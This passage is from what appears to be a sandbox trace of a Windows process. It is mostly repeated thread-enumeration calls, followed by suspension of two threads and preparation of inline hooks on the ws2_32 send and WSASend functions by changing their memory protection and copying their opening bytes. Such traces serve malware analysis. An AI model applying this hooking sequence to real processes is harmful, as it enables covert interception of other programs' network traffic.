lpte=0x243fea8) returned 1 [0173.721] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.721] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.722] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.722] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.722] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.722] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.723] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.723] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.723] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.724] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.724] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.724] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.724] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.725] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.725] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.725] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.725] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.726] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.726] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.726] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.727] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.727] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.727] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.727] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.728] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.728] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.728] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.728] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.729] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.729] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.729] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.730] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.730] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.730] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.730] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.731] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.731] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.731] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.731] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.732] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.732] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.732] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.733] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.733] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.733] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.733] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.734] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.734] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.734] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.734] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.735] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.735] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.735] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.736] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.736] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.736] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.736] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.737] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.737] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.737] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.737] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.738] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.738] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.738] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.739] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.739] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.739] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.739] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.740] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.740] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.740] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.740] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.741] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.741] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.741] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.742] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.742] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.742] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.742] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.743] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.743] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.743] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.743] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.744] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.744] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.744] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.745] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.745] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.745] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.745] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.746] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.746] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.746] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.746] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.747] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.747] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.747] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.748] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.748] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.748] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.748] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.749] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.749] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.749] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.749] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.750] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.750] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.750] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.751] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.751] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.751] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.751] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.752] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.752] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.752] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.752] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.753] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.753] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.753] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.754] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.754] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.754] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.754] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.755] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.755] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.755] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.755] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.756] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.756] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.756] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.757] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.757] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.757] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.757] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.758] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.758] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.758] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.758] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.759] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.759] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.759] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.760] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.760] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.760] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.760] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.761] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.761] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.761] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.793] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.794] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.794] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.794] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.794] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.795] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.795] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.795] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.796] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.796] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.796] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.796] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.797] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.797] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.797] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.797] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.798] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.798] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.798] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.799] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.799] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.799] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.799] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.800] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.800] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.800] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.800] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.801] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.801] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.801] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.802] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.802] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.802] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.802] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.803] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.803] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.803] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.804] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.804] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.804] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.804] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.805] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.805] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.805] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.805] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.806] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.806] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.806] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.807] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.807] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.807] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.807] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.808] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.808] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.808] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.808] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.809] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.809] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.809] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.810] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.810] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.810] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.810] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.811] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.811] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.811] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.811] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.812] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.812] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.812] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.813] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.813] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.813] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.813] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.814] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.814] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.814] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.814] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.815] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.815] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.815] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.816] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.816] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.816] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.816] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.817] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.817] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.817] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.817] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.818] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.818] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.837] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7e8) returned 0x8c [0173.837] SuspendThread (hThread=0x8c) returned 0x0 [0173.837] CloseHandle (hObject=0x8c) returned 1 [0173.837] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x99c) returned 0x8c [0173.838] SuspendThread (hThread=0x8c) returned 0x0 [0173.838] CloseHandle (hObject=0x8c) returned 1 [0173.860] CloseHandle (hObject=0x88) returned 1 [0173.860] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0173.860] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0173.860] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0173.860] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x80000 [0173.861] RtlMoveMemory (in: Destination=0x80000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x80000) [0173.861] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0173.866] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0173.866] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0173.867] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0173.867] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x90000 [0173.867] RtlMoveMemory (in: Destination=0x90000, Source=0x75bc4406, Length=0x5 | out: Destination=0x90000) [0173.867] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0173.872] GetCurrentProcessId () returned 0x7e0 [0173.872] GetCurrentThreadId () returned 0xb74 [0173.872] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0173.873] Thread32First (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.874] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.874] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.874] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.875] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.875] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.875] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.875] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.876] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.876] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.876] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.876] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.877] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.877] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.877] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.878] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.878] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.878] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.878] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.879] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.879] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.879] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.880] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.880] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.880] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.880] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.881] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.881] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.881] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.881] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.882] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.882] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.882] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.883] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.883] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.883] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.883] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.884] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.884] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.884] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.884] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.885] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.885] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.885] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.886] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.886] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.886] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.887] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.887] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.887] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.887] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.888] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.888] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.888] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.889] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.889] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.889] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.889] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.890] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.890] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.890] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.890] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.891] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.891] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.891] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.892] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.892] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.892] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.892] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.893] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.893] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.893] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.894] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.894] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.894] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.894] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.895] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.895] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.895] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.895] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.896] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.896] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.896] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.897] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.897] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.897] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.897] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.898] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.898] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.898] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.898] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.899] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.899] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.899] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.900] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.900] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.900] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.900] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.901] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.901] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.901] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.901] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.902] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.902] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.902] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.903] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.903] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 